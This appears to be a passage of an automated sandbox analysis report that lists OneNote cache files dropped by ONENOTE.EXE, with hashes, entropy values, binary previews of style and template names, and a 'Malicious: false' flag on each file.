SSDEEP:	6:NTcRhvBhQ63ESFtyLx8Olu3afPFNPYw1EWNPk:VcvztV38dNPYQEWNPk
MD5:	86CB1FD272539C0CE95CB5016F74D0F7
SHA1:	50A49DC89B981FA400907002882E6A739043F9C3
SHA-256:	37EA96BC424DD31F8D58C90E474F968A72E8B564920C6CFDDFEC0A1AA8CD19D4
SHA-512:	2B649F9FF6BD60D24EB395C6943B9B9E5B525B8BC7F093DF24AD9767AAD63424A2003F3336A4A75AFB29441F7E8D76A687BD67D9C26F485731D14C2DE960BCAC
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................R.......R....b.L......}.........................R....b.L......}.R....................................................R.......R...................................................R.......R..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.........J.%.c..C.....N...^.................................................................................................................J.%.c..C.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.731857108728666
Encrypted:	false
SSDEEP:	12:KUCyIsW8WdZdcpLeIWv57eIWc1R6mQEb6W:KUcHbkLQ7f6mf6
MD5:	3932E7CF330FF464E5860601DD33B2EA
SHA1:	584DDC873A30CA2803C3770793DF8FF3CA992019
SHA-256:	BA23A282187F4F6055F2E69C5E95B380A9C9C0ACA2B6D7D18C7F7FD779C558F8
SHA-512:	0DA8BEF0B042591AA9E1E1F63BED3B1C253739D86535463C15FCA6C828F7CFAD111AC8ABF4CBBC160141BCA8079C6BB47C5EF2B79CD96012BB9A0DDEADC1A186
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................ez......ez....K..\sTuuB.......B......M.....`.Zez....K..\sTuuez..B......M.....`.ZB................................B.......B...................................................B...."..B..\....B..N....................................................ez...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............B....1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s............Z-.:J...sCA.-....N...^..............................................................................................................Z-.:J...sCA.-....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4792193510929028
Encrypted:	false
SSDEEP:	6:NTca/lX83CPeimCPIk0kCyLx8Olu3afqNYw1EDNk:Vca/9PeYPEkCV38MYQEJk
MD5:	FE5349DFCC599CE7824A0FD67083DACA
SHA1:	6077F8B49EE27EC8842832843CFBFB82AA888C17
SHA-256:	E30B8338685A840DB8D88E87A2FC98716996E811FF80F4E675D8E30A67758340
SHA-512:	A48CC21B6188B229038060B77D00E5464A42729E07C500336EFA7ECAAC1AB1A818E802E08143EC68493C1FB7EA185E7F7630A2DB76D8C57684AEA256C5A56E42
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................?.o.....?.oG8..A......f.........................?.oG8..A......f.?.o..................................................?.o.....?.o.................................................?.o.....?.o\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....&..nb.I..F..0e....N...^............................................................................................................&..nb.I..F..0e............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6376640635337497
Encrypted:	false
SSDEEP:	12:UeEkoC5Zp2n6nkNYKQQnkNYVotrlcQETotS:U5C5ZZkNbQQkNommH
MD5:	D1E18CECA023EE022B36EC91EB0AA631
SHA1:	EA3B03A0B2A134ECEB514FE71E2B604E685119BD
SHA-256:	46DBA1E83688E5B923FD3100228573398F91772FDF13A47076A42AB958CA7AF6
SHA-512:	BB2308B4179CB9F665C9AD5D571648BCBD4DE9BC50E7C099ED0A0CA8CF725A6E1FCFB87DA6276236FC0267DA42CB0BD77783E918B4014BA9BE15CA56FD79C291
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................W:~.....W:~...<M.{.S.cp........................W:~...<M.{.S.cpW:~..................................................W:~.....W:~.................................................W:~.."..W:~\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.........R..n...@..cV;9HW....N...^...........................................................................................................R..n...@..cV;9HW............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8012804023306926
Encrypted:	false
SSDEEP:	12:+wfEq6OzRhlUhFtlSsD4YwsD4CZAQEfP0:+Rn5wnYwnN
MD5:	CC61DB38E8444BA8F1B80DA60CDDB3D9
SHA1:	9A0F59302C2185FCE0FB160B0795A70103C9FCDA
SHA-256:	B41A7C2F9755215EA37CE1D2B30D148DDB003DFF0A914BAB21B6F02836E3B301
SHA-512:	E515A827FA1A606AAE4388AE88352FE8A0A4FDF4429D26E8928EE3448D392EE48A20619EB32DD95D8DD787AEDA09A304F9235622245CF4425CCC63EF28297156
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................U.%.....U.%r..O..fP.u-.z"A.....z"A.CkGM..#E...+z"A.CkGM..#E...+z"A.U.%r..O..fP.u-.U.%..............................U.%.....U.%.................................................U.%..#..U.%\....U.%N....................................................z"A..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............U.%..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........[Y..1.N...f0.......N...^...........................................................................................................[Y..1.N...f0.......................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4764134317056371
Encrypted:	false
SSDEEP:	12:Vc36hV1l4/iGlV38LOv8o0KiQE1v8o0Ka:ZVL4KGb386v5Ohv5
MD5:	FE4D28A288DBBCFCED95DDAAADC7BED9
SHA1:	A95EEBC35331D287B4133035A741F3C56AB13BB4
SHA-256:	3BC62360D8292721E562D5777A684E6F0BB5247D2BF7434473016A3CEED10966
SHA-512:	BA6848996A498FD0820677BD99742CAED62D96DEE436FE5247E1001772CFDF729B468AB7F6563859E8EF91BB9428D2FC234E584C4AAEA68DF871F149C7EC7532
Malicious:	false
Preview:	2...>...........~.........................................................................................................................................................................................`.......`...N...rd.............................`...N...rd.....`....................................................`.......`...................................................`.......`\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3......+A..D..QX.5......N...^..............................................................................................................+A..D..QX.5..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.4645181443505395
Encrypted:	false
SSDEEP:	12:NX8lpgfuMjgnXM7Z/v51dD12SC0WJhdNaIf6x+nC3Udugad7sjlcQEwXYsa:RSpa1jgWBMkWt0ig+CsuB7ecEo
MD5:	757B9440260201C2DDC2CCCCFAD624CD
SHA1:	A13513952B03E3FF5C8330B35EB2AAADF9BD781C
SHA-256:	50D82D6E6CB2208CC8A405E0C1F1000FB244B096611E9728B2F05A0344E664CC
SHA-512:	2FEE61805D7F1DEC676B6CFE7CA24155A552ECEA21A66D2DCB189AC7E8C3D87514C7DE3302A42C7E0EE8DBA852E6F6F05E5EDC08A8F9F8300123F79668C7445A
Malicious:	false
Preview:	........ .............................?.................................................................................................................................................................._r......_r[..;M..i\.n<..\{......\{6.H.E.s....;899....?A...O.i1.99.......Y.B..P..>.......\{6.H.E.s....;8.\{..........99......99..................................................99...@..99.\....99.N....99.N.)..99.N.9..99.N.>...........................\{..c..,.........................4..1...(...(.......U.s.e.r........99...1... ..$....U.s.e.r.........................C..0.j.99......99....?A...O.i1.2................................\{...........................................c..,...................99..99...1... ..$....U.s.e.r....................Y.B..P..>..99......99....?A...O.i1.......C..0.j......\{6.H.E.s....;8.\{.._r[..;M..i\.n<.._r.....>....................Y.B..P..>................................................c..,...................99..99..99...1... ..$....U.s.e.r...................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7172662883928961
Encrypted:	false
SSDEEP:	6:jxfEhhHIHiUn7en/ZiHdlqQ0hx8CAXCkIi5DWAXlfWG1Yw1EuG1k:KDqi++/QnV5Xnnd9XlfD1YQEb1k
MD5:	E180491CBA3FF394526B136CA88F51FE
SHA1:	1D79D54ED63EA9AAEF4E9234AE318D2739E392DE
SHA-256:	E22420A2198FD80C22317E2C0FCA1215319C1C9F8B62B176F72E7A16623978B8
SHA-512:	C7D376A6B52FAA09DF5A0860AFC57B306732638463B1F0D648C0462CFE96A03CDAF2153F6DED2AFB22C35AE0B79F3F25672D7777C9FF8B298FBCF908CE4652F7
Malicious:	false
Preview:	2...>................................................................................................................................................................................................... O...... O....N....&[.Lr......Lr....jL..jt..hMLr....jL..jt..hMLr.. O....N....&[. O...............................Lr......Lr..................................................Lr...!..Lr.\....Lr.N.................................................... O...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........Lr...1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............&..""C..=.........N...^.............................................................................................................&..""C..=.................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47889729386170565
Encrypted:	false
SSDEEP:	6:NTc/Z2lPZ9Umjy6iaiyLx8Olu3af6008w1Ev00A:Vc/ZAZ9Ur6sV38nQE2
MD5:	05E651319CAF00377A9ABE7062F64DAA
SHA1:	E007451CA7FC6B2661BDC2C2D4EAC488EB7501EF
SHA-256:	6FB337BCF659AD620B1D999D95351F9FEA7A9B1B33D46B20D2C0F688DC1A0F19
SHA-512:	AD594B4300945676F2B87719F3F07D2C9FD9A2426A4F14EB546D101E2EA5B913E8052B8E50C8DA999C1CEAEC29A0701FCDBB6D72639550134D7CA856C57DDE09
Malicious:	false
Preview:	2...>...........~.........................................................................................................................................................................................\.......\J.A..................................\J.A.........\....................................................\.......\...................................................\.......\\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....p$..'.J.......S....N...^............................................................................................................p$..'.J.......S............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.733289712388019
Encrypted:	false
SSDEEP:	12:KUCcxk4MzWieIW55n7eIWc1MAPvyKQEx3Pvyy:KUvRiK5n76qvyKt/vy
MD5:	9CBD255E2944BB43EDB3935A1884CE46
SHA1:	A63E22552F8A82A10ADA7D9C90FD505114895F4C
SHA-256:	D65FB7FBDFDB273637DCB6FB8A2624E63DACED61DEAAD71272AE637EE67EB95C
SHA-512:	7ADB0033A959C3117409E338FCEAEFB12065FECFDC818AF7C561A024E50BEC790C145D7947CAFCFF3251E02D0629364D215ACEBBEC31D3218400209A58974F1B
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................H.2.....H.2..1K.....mO.............b.M..@.B..yH.2..1K.....mOH.2......b.M..@.B..y..................................................................................................".....\.......N....................................................H.2..c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s...................1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........b...j.C..T.LLe.....N...^............................................................................................................b...j.C..T.LLe.....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48203566128657704
Encrypted:	false
SSDEEP:	6:NTcJ8ElMmDRyLx8Olu3af7Etqw1EGTEtS:VcJ8ElMmDRV387EtqQEGTEtS
MD5:	13A45FE5FD002D98409124D9618B45A2
SHA1:	EE36D3F4FC6867BBF54D1FB1A6E8F1F2A01E802D
SHA-256:	760303624C71072AE13EE147FB04E5D10E0C2D3361C6628ED5FD87B1CBD7C233
SHA-512:	8E98E1AB5FEA80F36D8154438FB8BCDA8C3CF73519D34B0B81765B775CC16AF976BC41423ED13BE7810903CB884798FBC36E6C6908F7DF84D658AE31EB07339D
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................4......4.FVoC..`.k_...........................4.FVoC..`.k_...4...................................................4......4..................................................4......4\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...F...}.G.\...X......N...^...........................................................................................................F...}.G.\...X..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6501433451062505
Encrypted:	false
SSDEEP:	6:UWBEt4NLHlXAIHLx88cbrMkq2Sz1MQQcbrMkq2Sz1rfgcw1EIEfqK:UeEt4N7lQGnkNYKQQnkNYlocQEIEZ
MD5:	DBE2397B629BD6E35853E162DF01C125
SHA1:	7A99084FA7D4ADAA9EB99B3C906D6FD1DABC100A
SHA-256:	07589626F54E59A0A5D2F7F24C5A85D254E1D36DFFEECBD5D92D33B1848102CE
SHA-512:	163C04BE3B99266DB61BB64BED4777987113F4AA741E1067E1D3E558C47CC72F998E75880C95E3DA1D2171691BC149DADA2C2CBE21BBB511696E20CCCACA2A6F
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................T.......T...oUC.v....Y_.........................T...oUC.v....Y_.T....................................................T.......T...................................................T..."...T.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s..........j..f.N....G.......N...^............................................................................................................j..f.N....G...............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8003991424492383
Encrypted:	false
SSDEEP:	12:+wfEsC3UHsC6dVNo5zsD4+8DwsD4ChbAw3cQEnbAwQ:+0C32sC6d/0n+gwn0Aw3c3Aw
MD5:	4C24498FA5E90BDAE300438213DB595E
SHA1:	2A77B5531CCE87493A7DFE894197AC0830395DBF
SHA-256:	37DE8425A199C33FA56477FBBECEA56B618D83A8D130511C85F3DFDE6DC906A6
SHA-512:	A3FA7B4B0DB3F36B6D510FB0B1C5B37A10E662F184106BAEA8ECE87B0179B845A3F7E42DFFCF2B0D8A65AA5771DFCFB43E2F761EA0F83C0736611A4CA8E7721F
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................h.......h..T.F.......%.q.......q.7.>.A..m8.s..q.7.>.A..m8.s..q....h..T.F.......%..h...............................q.......q...................................................q...#...q.\.....q.N......................................................h..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...............q...1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........NE7.K..K.)e.s;.....N...^...........................................................................................................NE7.K..K.)e.s;.....................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4796167965043822
Encrypted:	false
SSDEEP:	6:NTcULwlyQLOrOgqPftyLx8Olu3afM3mT2liw1EDmT2la:Vc+wlL4z0VV38M2T2liQEiT2la
MD5:	02BC85FFFEF7A77888B4AB46B6E3184F
SHA1:	F75D8B703B8EFCFDA988D042857A3B05F9B9FAD2
SHA-256:	4448E5D2A911BA923F77F8ECA5CD2CFB8F716D7B646988C75E3DCF63EC2DD728
SHA-512:	E524FB3CF5F31D7C0BFE85B0B9E79BEB65D7E898F15C19B4B78D98FE46862CECFDF5D989D41073990A5563E020586BAC14E5A8038AB68EE1141598BB332F9472
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................6j......6j.a..^C....#;77........................6j.a..^C....#;776j...................................................6j......6j..................................................6j......6j.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....-...K.J.r....g.....N...^............................................................................................................-...K.J.r....g.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6972669373014362
Encrypted:	false
SSDEEP:	12:ghC+G/GCxaFGC45gMDwV5aDWDwVhLVrQEAxVn:gFVCE8CAgPV5aDpVBVrMxV
MD5:	A536BCA1E4059AB82E012C3A9CA81789
SHA1:	0A78BB3115A784A9041141B79D625B1C4283417A
SHA-256:	B58297204F334AD3955B150123DEA0602BF080F81848693AEE839A828BCF2E8F
SHA-512:	824E5EDD751A077E2D9D97E2F0F6E96158011FAB82656DE25ACFEDAE58B9176559EA1A61C731B0B62E715CA4624221D1C829774CB2089EEF3E2C92102F837C09
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................u.......u..N...J.[zL...m=6.....m=6.Q..N.D.$cg..u..N...J.[zL...u...m=6.Q..N.D.$cg..m=6..............................u.......u...................................................u....!..u..\....u..N....................................................m=6..c..,.........................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t..........u....1... ..$....L.i.v.e.C.o.n.t.e.n.t..............B.....A...{..i.....N...^............................................................................................................B.....A...{..i.............................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9130855199093662
Encrypted:	false
SSDEEP:	6:9/Rsso0tRJXST8SIbJXkKtT1gls0Ex8Ms5Ay+l/BB83+vK3jNABHrw1EIHn:zPoUFS4nFNtRgVvctXzvKTNoQEa
MD5:	8486275A27CB9F412E86AD8DB92BACAE
SHA1:	6791A042AD12A2CA761848574AD45BAD4C3D93FE
SHA-256:	91BF992682561B5972A03F69BC610BE9400A5CA37DE4B3D043DFCE0C104AAE6E
SHA-512:	6CC76B6020AE10D3294F68D3C24259659FB74E9D48BC380682CE8921D24BDE03FE46E5232D9957EF5E8F56B1F98F28E4EE548972969114E8A73B3EE2D1FD6DA6
Malicious:	false
Preview:	....>....................................................................................................................................................................................................l.......l.,p.J.,}<..)............6>.D.q.;B>f....6>.D.q.;B>f......fB.w/.G....j@..fB..l.,p.J.,}<..)..l............................................................................+.....\.......N.......N.)...........................................l...c..,.........................4..1...(...(.......1.6.................1... ..$....1.6........fB......fB.w/.G....j@............6>.D.q.;B>f.2................................l........................................fB..c..,............................1... ..$....1.6...........-.;.0.\G..P."]MX....N...^...........................................................................................................-.;.0.\G..P."]MX............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.4527222659028272
Encrypted:	false
SSDEEP:	12:uWPUypMUdMWa8mcROUtUaPEUasX4e27j5gEUaHMo0kGwGyduocAnEUamaEUa2HRu:ucHpNdeUObSlajelO0kVRk8lralU
MD5:	D88CC9CD5C146AF67C7BD7190E5CEE88
SHA1:	65E58529CE70865F2E9BC621F2EEAF7F42BC1516
SHA-256:	14C6C456E308C614F8349C417667F7FB7B59ACDBD2A09010376BC7EB2E9F45B3
SHA-512:	27E8CDA4AEE76EAC99E8489F76ACAA7965A3835F1CE3C203B7D1883F9B54459264C1BA1BBFE7E1F78D4867D47067A11562CC4B2B46EE2807030B366C5CF56599
Malicious:	false
Preview:	..................................................................................................................................................................................................................._..N.n9z6l..t5......t5.L..@.D.4F...t5.L..@.D.4F...t5.....C..\A..m..P4......f.a...A..v.g6..f............f.......f...................................................f...B...f.\.....f.N.....f.N....f.N.:...f.N.@..........................t5...c..,.........................4..1...(...(.......M.a.n.a.g.e.d...........f...1... ..$....M.a.n.a.g.e.d........................C..\A..m..P4..f.......f.a...A..v.g6.2....................................f........................................c..,....................f...f...1... ..$....M.a.n.a.g.e.d.........t5......t5.L..@.D.4F...&.......&.....E...\|...&.....E...\|...&......._..N.n9z6l............................>................f.a...A..v.g6..........................................&....c..,....................f...f...f...1... ..$....M.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7151578704080009
Encrypted:	false
SSDEEP:	12:KACWnnB9/xnnAlibThXnpD9XlgTLQEHTH:3nBznAlwXpD90LDT
MD5:	9DA20E622738933C7725B9A89F06FD81
SHA1:	B3B8624720E5EE5888512C058FBED4A7D2BA7A50
SHA-256:	3AEE375867AAD392283564F41D624D524A3F638CB6FB60F21BCC4300E17A668A
SHA-512:	6A0D0E23450D3AD59CEA68F315ECE64CD03A356E3916E06AB51B2671B26B88338D58DF7AE0C3E39157919820A52BB454C8B187477FCC80622E16503CCD7FE7F9
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................$.......$.p...N....N..N0.L.....0.L....K...Yb..0.L....K...Yb..0.L..$.p...N....N..N.$...............................0.L.....0.L.................................................0.L..!..0.L\....0.LN.....................................................$...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........0.L..1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..............$...<M.... g.....N...^............................................................................................................$...<M.... g.............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4804976738817115
Encrypted:	false
SSDEEP:	6:NTcHpiLiKxhlAk4h3xRyLx8Olu3afeQc9sZcw1EkocQc9sXK:Vc8xzAxh3xRV38YpQEkPSK
MD5:	1F61104975BC409993B31CEA4AC6472D
SHA1:	4FD2B2D2D84856C7847975E5E1445975A7C6E682
SHA-256:	184D3CC0D73A0EE173564645359997DE8237E4F22D8DFE96BE4309D15CEDBEFF
SHA-512:	F8B9C61B2E4E840733297F7F01A0FFB2AD21018D32136FB097DF0E0BC74473EA9A38D869446F38FCEBFE15F5FDF276DEDA537AB13CC4B9F1FA625ED5E3868653
Malicious:	false
Preview:	2...>...........~.........................................................................................................................................................................................].......]&]..F..-g.&4...........................]&]..F..-g.&4...]....................................................].......]...................................................].......]\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...4..K.+.L.3..[.H....N...^...........................................................................................................4..K.+.L.3..[.H............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7271254559272573
Encrypted:	false
SSDEEP:	12:KUC+/Emu6lEs5Bt+3tqbVeIWeW7eIWc19mQEj:KUT/EmHlEa43io7K
MD5:	79FBDC4FD9B1C909298E2C5DB299E864
SHA1:	B7A4C1B9419CC99ACD4CFF96584EB17FD9593152
SHA-256:	98159B67FACF344EA6E5C04D353675CF1E197DC9163AD574F5D7ACEA0EAA1ECC
SHA-512:	882C76D587B594262E250D39326B5DF4AAE8CE51A951EC0A5D3B4434326B2060C9D14CF3871750D696C4BA95B324CADC29F8D9FE38FA6B86E0EB31FDA541AEA8
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................l.......l!..@...!zS...........B.(.C... .5...l!..@...!zS...l....B.(.C... .5....................................l.......l...................................................l.."....l\......lN.........................................................c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................l..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........{T.....M...Fh-......N...^...........................................................................................................{T.....M...Fh-......................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4804700990475034
Encrypted:	false
SSDEEP:	6:NTcW/lEOCte2ldyLx8Olu3afpAUA2Mlcw1EqBUA2ClK:VcEgeCV38kTlcQEwK
MD5:	EDC613C4D4B1953C85F8D939583C2BF2
SHA1:	ADCFC35969020995B7664600CE5D138A3C454B22
SHA-256:	AE9B4FEDFC8CE2E85D0497AF50533EE5BABD4346EE0F4AFC2DC54F591EA6394B
SHA-512:	70B4095117346DB440FE479C079EE5209779279314454646D8A641D9124348F6E552DC8CED8ABB1CDDEF1F1473097ABD8C369161E85F9EF57BE004288FEDD295
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................M.......M..4./@..m.f............................M..4./@..m.f...M....................................................M.......M...................................................M.......M.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...:..H..C..,%.h......N...^...........................................................................................................:..H..C..,%.h..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.647484725143067
Encrypted:	false
SSDEEP:	6:UWBE8m2VR2c/0rXfUrLx88cbrMkq2Sz1MQQcbrMkq2Sz157NYw1EW7Nk:UeEgdcAjnkNYKQQnkNY/NYQEiNk
MD5:	95E4A0409FFC8163924051939E25E4AD
SHA1:	E47AB17658E18A6AD13B29DAA9CE2BD126D9A4BC
SHA-256:	6008524800AA048D4ACAA1633F629AF7514BB6B6B98DF469826002D040750520
SHA-512:	93EC43822E3CB2092D8836B39A53A715F8C62E1A659FEC44D2D22C2588F44AC1A214708763E4620DE9A73032504158B78DF5A1D0AEDE326B453DE805EE4F32CA
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................X.;.....X.;..pA.......d........................X.;..pA.......dX.;..................................................X.;.....X.;.................................................X.;.."..X.;\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.........a..D...N..:._sa.....N...^...........................................................................................................a..D...N..:._sa.............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7936891565104932
Encrypted:	false
SSDEEP:	12:+wfExqElZZsFlwl/lZjZmLDsD43wsD4CLiQEOa:+5qGZYlwlTjZ4n3wnuiy
MD5:	E58BBCA57C62619E30634AF5BB385DDF
SHA1:	70DC03556E82ABA25CE823A8963797D29DD9BB20
SHA-256:	C54CC1C5822F2AAB132D75302192E914EFA9F9A721998C100D8042D5576E09D1
SHA-512:	160D7189588BBEA41B6EF5C975E3B7D918ED0B974872E089828A1224FE95F7C592BA132FA606E33F25B631A4036F0734F7BB02FF092C81438AA33C9BBD4804FE
Malicious:	false
